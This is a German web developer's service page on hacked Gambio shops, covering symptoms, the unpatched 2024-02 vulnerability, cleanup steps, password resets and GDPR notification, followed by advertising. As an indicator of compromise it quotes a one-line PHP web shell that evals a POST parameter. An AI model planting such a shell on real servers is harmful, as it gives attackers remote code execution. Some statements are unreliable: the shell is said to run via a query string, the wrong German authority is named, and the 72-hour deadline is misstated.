In den letzten Monaten rollte eine nie dagewesene massive Hackingwelle über alle Gambio Shops hinweg. Symptome sind meistens das Vorhandensein einer Datei gma.php und gmo.php in Root des Shops. Ich helfe Dir zuverlässig und schnell bei der Absicherung und Säuberung Deines Gambio Shops!
Wurde mein Gambio Shop gehackt? Ob Dein Gambio Shop gehackt wurde erkennst Du häufig an vielen neuen Kunden mit zufälligen kryptischen Namen, die nach April 2024 angelegt worden. Auch die beiden oben genannten PHP Dateien sowie weitere kryptische PHP Dateinamen im Stammverzeichnis des Shops – aber öfter auch in tiefen Unterordnern – sind ein eindeutiger Hinweis auf einen erfolgreichen Hack Deines Gambio Shops.
Wie wurde mein Gambio Shop gehackt? Das Einfallstor Nummer eins bei allen von mir untersuchten Hacking Vorfällen von Gambio Shops war immer ein fehlendes Sicherheitspatch 2024-02. Kontrolliere bitte als allererstes, ob dieses unter Gambio Store > Module installiert ist. Wenn nicht so kannst Du dieses einfach selber mit wenigen Klicks installieren. Das ist eine Sache von fünf Minuten. Du solltest immer darauf achten, dass kritische Sicherheitsupdates zeitnah eingespielt werden. Die wenigen Minuten können später etliche Stunden Arbeit und Scherereien mit Kunden und Datenschutzbehörder ersparen.
Ist mein Gambio Shop jetzt sicher? Nein. Auch das offline setzen des gesamten Gambio Shops bringt keinerlei Sicherheit gegen weiter Zugriffe durch Hacker. Das Einspielen des Sicherheits Patches 2024-02 sichert Deinen Shop zwar gegen zukünftige Hackingangriffe auf die gleiche Schwachstelle ab. Aber die Hacker haben sehr sicher bereits vollen Zugriff auf alle Dateien und die Datenbank Deines Shops. Sie kennen mit hoher Wahrscheinlichkeit das Admin Passwort für Deinen Shop – und sie kennen definitiv auch das Passwort zu Deiner Datenbank. Damit hatten sie vollen Zugriff auf alle Kundendaten.
Wie genau erfolgte der Hacking Angriff auf meinen Gambio Shop? Im Internet gibt es zahlreiche Services wie z.B. whatcms.org. Mit diesen oder selbst geschriebenen Scripten lässt sich einfach herausfinden, welches CMS oder Shopsystem in welcher Version auf welcher Domain läuft. Automatisiert man derartige Abfragen so kann man viele tausend Domains binnen kurzer Zeit darauf überprüfen ob eine angreifbare Gambio-Version vorliegt. Wenn dem so ist, so sorgt ein sogenanntes Exploit-Script dafür, dass mit bösartigen Code die Schwachstelle ausgenutzt wird. Der Hacker kann nun als erstes Dateien in ihren Gambio Shop hochladen. Genau das ist seit spätestens Mai 2025 massiv zu beobachten. Zuerst erfolgen immer kleine „Versuche“ reinzukommen. Ein oder zwei neue Kunden mit kryptischen Namen erscheinen neu im Admin. Wenige Dateien wurden geändert oder neu hochgeladen.
Und was ist daran bitte so schlimm? Die Dateien, die der Hacker hochlädt sind in der Regel sehr fortschrittliche Administrationstools wie z.b ein Web FTP Tool oder auch ein Datenbanktool wie Adminer (gma.php, Dateigröße meist 398kB). Auch das Nachladen von weiterem verschlüsselten Schadcode häufig via GitHub – ist nicht ungewöhnlich. Mit den Tools hat der Hacker dann endgültigen vollen Zugriff auf den gesamten Shop, die gesamte Datenbank und damit auch alle Kundendaten.
Wie sehen die gehackten Dateien aus? Neben dem Adminer Script laden die Hacker oft mehrere php Dateien mit kryptischen Dateinamen ins Root Deines Gambio Shops. Der Inhalt kann z.B. sein: [{„Expires“:1,“Discard“:false,“Value“:“<?php echo isset($_POST[‚DxcWaNXL‘]) ? eval($_POST[‚DxcWaNXL‘]) : die(’no‘); ?>“,“Path“:“\/“,“Name“:“QikxaCnU“,“Domain“:“localhost“,“Secure“:false,“Httponly“:false,“Max-Age“:3}]. Übersetzt: wenn jemand an die URL der hochgeladenen Datei ein ?DxcWaNXL=“böser code“ anhängt, so wird „böser code“ auf deinem Server ausgeführt. Ein wichtiges Indiz bei der Analyse ist immer das Dateidatum.
Wie sperre ich nun die Hacker aus meinem Gambio Shop aus? Als erstes muss man immer den Shop komplett vom Netz nehmen. Nicht einfach offline schalten, sondern wirklich beim Hoster auf ein leeres Verzeichnis verweisen. Alle bösartigen Dateien müssen dann identifiziert werden. Ungemein hilfreich ist hierbei, wenn Dein Hosting Provider einen Virenscanner bieten. Es bringt rein gar nichts, die Dateien der Homepage herunterzuladen und lokal mit einem Windows Virenscanner zu überprüfen. Er wird nichts finden. Warum? Windows Viren sind generell etwas komplett anderes als Webserver Viren. Hat man alle bösartigen Dateien identifiziert so muss man diese zuverlässig und vollständig löschen. Bleibt nur eine einzige bösartige Datei auf dem Server liegen, so hat der Hacker weiter vollen Zugriff und kann abermals neue böse Dateien hochladen.
Wie gehe ich bei der Säuberung eines gehackten Gambio Shops vor? Als allererstes lege ich das Domain Root auf einem leeren Ordner, damit keine der bösartigen Dateien, die der Acker hochgeladen hat erneut durch diesen aufgerufen werden können. Erst in einem Reinraum kann man Viren ohne äussere Störeinflüsse bekämpfen. Leuchtet ein, oder? Als nächstes installiere ich das ganze Sicherheits-Patch 2024-02, falls noch nicht geschehen. In einem weiteren Schritt identifiziere ich alle bösartigen Dateien und lösche diese. Auch eine Überprüfung der Datenbank ist ratsam, da es technisch sogar möglich ist, dass der Hacker bösartigen Code in der Datenbank versteckt.
Welche Passwörter muss ich ändern? Du musst wirklich restlos alle Passwörter ändern. Der Hacker hatte vollen Zugriff auf alle Kundendaten und damit auch auf die verschlüsselten Passwörter. Diese kann man knacken. Die wichtigsten Passwörter sind: Gambio Shop Admin(s) Passwörter. FTP Passwörter. Zugang zum Hosting Provider. Falls Du im Gambio Shop SMTP für den Versand der E-Mails verwendest (ratsam!) so sollte unbedingt auch das Passwort des betreffenden E-Mail-Postfachs geändert werden. Die Konfiguration in Gambio unter System > Emailversand muss natürlich auch geupdated werden.
Wie? Ich soll alle meine Kunden informieren, dass mein Gambio Shop gehackt wurde? Ja. Laut europäischen Datenschutzgesetzen bist Du dazu verpflichtet, alle Deine Kunden binnen 72h zu informieren, wenn Dir bekannt wurde, dass deren Daten in fremde Hände gelangten. Des weiteren musst Du auch die für Dein Land zuständige Datenschutzbehörde über den Hack informieren. In Deutschland ist das die Bundesnetzagentur.
Wenn Du erst einmal die Datenschutzbehörde über den Hack Deines Gambio Shops informiert hast, so will diese in der Regel zeitnah zahlreiche Informationen haben. Sie fragt nach den Mitteln, die zur Säuberung und Absicherung des Gambio Shops verwendet wurden. Sie fragt nach der Qualifikation des Freelancers, welcher den Shop gesäubert und abgesichert hat. Auch Fragen rund um das Thema „was haben Sie getan, damit ein derartiger Hack nicht noch einmal passiert?“ können gestellt werden. Solltest Du Dich zu einer korrekten Abwicklung des Hacks entschieden haben, so kannst Du davon ausgehen, dass durch die Involvierung der Datenschutzbehörde der Aufwand leicht um den Faktor zwei steigt.
Wie hoch ist der Aufwand, meinen gehackten Gambio Shop zu säubern und wieder abzusichern? Der Minimalaufwand liegt je nach Tiefe des Hacks bei wenigstens fünf Stunden. Bei weitreichenderen Hacking-Angriffen kann der Aufwand auch auf mehr als das doppelte steigen. Informiert man Kunden und Datenschutzbehörden wie vorgeschrieben, so steigt der Aufwand weiterhin um wenigstens 50%.
Wie schnell kann ich Dir helfen?Rufe mich jetzt am besten per Whatsapp an: 0049 178 975 7448. Bei entspannter Auftragslage kann ich Dir in der Regel sofort helfen. In diesem Fall kann Dein gehackter Gambio Shop gegebenenfalls noch am gleichen Tag wieder abgesichert online gehen.
Wir haben bisher an 65 Gambio-Internetshop-Webseiten gearbeitet:
Komplettangebot für die Erstellung einer Internetshop-Homepage incl. individuellem Design, allen nötigen Konfigurationen am Shopsystem sowie einstellen der ersten Artikel. Wir empfehlen Gambio GX.
Shop-Homepage mit Anlegen von 10 grundlegenden Seiten: Start, eine Produkt-Hauptkategorie, eine Unterkategorie, eine Produktseite, Kontaktformular, Bestellung, AGBs, Widerrufsrecht, Hilfe, Impressum
Bis zu 6 Stunden Layouterstellung und Änderung nach Ihren Wünschen, individuelles Layout mit Ihrem Firmenlogo
Einbau des Entwurfs in Gambio auf Basis Standard Template EyeCandy mit updatesicherer USERMOD Technik
Konfiguration des Shopsystems nach Ihren individuellen Bedürfnissen
Saubere Suchmaschinenoptimierung aller Seiten auf relevante Keywords
»Herr Woelky ist der perfekte Sparringspartner und ein echter Experte für das Gambio Webshop System. Er hat uns ausnahmslos termingerecht weitergeholfen und sehr guten Input zur Strukturierung der Daten gegeben. Wir sind froh, dass er uns betreut.« Francesco Fusaro, Geschäftsinhaber, November 2019...
B2C ist die Abkürzung für Business-To-Consumer und steht somit für den Handel zwischen Geschäftsleuten und Konsumenten. Vergleiche auch B2B.
Webdesign ist die Ganzheit aller Dienstleistungen, die für die Erstellung, Änderung oder den Betrieb einer Homepage nötig sind. Typische Aufgaben im Webdesign sind: Entwurf, Layout, HTML-Umsetzung, JavaScript-Coding, PHP-Coding, Updates, Bildbearbeitung ... [ Mehr lesen ]
CMS ist die Abkürzung für "Content Management System", oder auf deutsch: System zur Inhaltsverwaltung. Ein CMS trennt Inhalte und Layouts einer Homepage und legt alle Webseitenteile in einer Datenbank ab. Die Inhalte können von mehreren Redakteuren gleichzeitig online bearbeitet werden. In Deutschland sind Weblication, Typo3 und Mambo beliebte CMS. Jedem CMS liegt eine Programmiersprache zugrunde, meist ... [ Mehr lesen ]
Datenbank Eine Datenbank ist ein elektronisches System von Karteikästen. Datensätze werden in einer Datenbank anhand von Reihen und Spalten eindeutig identifizierbar gespeichert. Größere Webseiten verfügen häufig über eine Datenbank: Kundendaten können gespeichert werden, Bestellung zentral geregelt, Suchen vereinfacht oder - beim Einsatz eines CMS - gleich die ganze Homepage aus einer Datenbank generiert werden.
PHP ist eine im Internet weit verbreitete Open-Source-Scriptsprache. PHP kommt häufig zum Einsatz bei Datenbanken, zur Authentifizierung mittels Cookies, Forensystem, Formmailern und vielem mehr. PHP ist objektorientiert und modular aufgebaut, was einen sehr großen Funktionsumfang und Erweiterbarkeit garantiert. Der Quelltext von PHP ist im Klartext ... [ Mehr lesen ]
MySQL ist ein Datenbanksystem, das häufig auf Webservern zum Einsatz kommt. MySQL ist Freeware nach dem Open-Source-Prinzip, d.h. es ist gratis. Es ist die Grundlage vieler auf Homepages möglichen Techniken, wie z.B. Adressdatenbanken, Foren, Content Management Systems, Shopsysteme und vieles weiteres. MySQL ist Bestandteil vieler ... [ Mehr lesen ]
Query String Ein Query String ist der hinter dem Dateinamen in der URL-Leiste gebrauchte Anhang von Parametern - meist nach einem Fragezeichen. Er wird zur Übermittlung von Daten und häufig auch bei dynamischen Webseiten eingesetzt. Google verwendet ebenfalls Query Strings und macht damit seine Suchseiten direkt verlinkbar: http://www.google.de/search?q=webdesigner. Der PHP-Bilderzoom ... [ Mehr lesen ]
Suchmaschinenoptimierung (SEO) ist die Verbesserung einer Webseite, die die bessere Positionierung der Webseite in den Suchmaschinen-Ergebnislisten zum Ziel hat. Es gibt gute Suchmaschinenoptimierung und schlechte. Gute Suchmaschinenoptimierung zeigt prinzipiell dem Besucher genau die gleiche Seite wie den Suchmaschinen. Schlechte zeigt z.T. vollkommen unterschiedlichen Inhalt an. Neuerdings sind Techniken im Einsatz (sog. Blogs), die durch bloßes Zusammenstellen und Kopieren von fremden Inhalten - in Kombination ... [ Mehr lesen ]
Nur ein sicherer Gambio Shop ist ein erfolgreicher Gambio Shop!
(2 Bewertungen, Ø 4,50 / 5)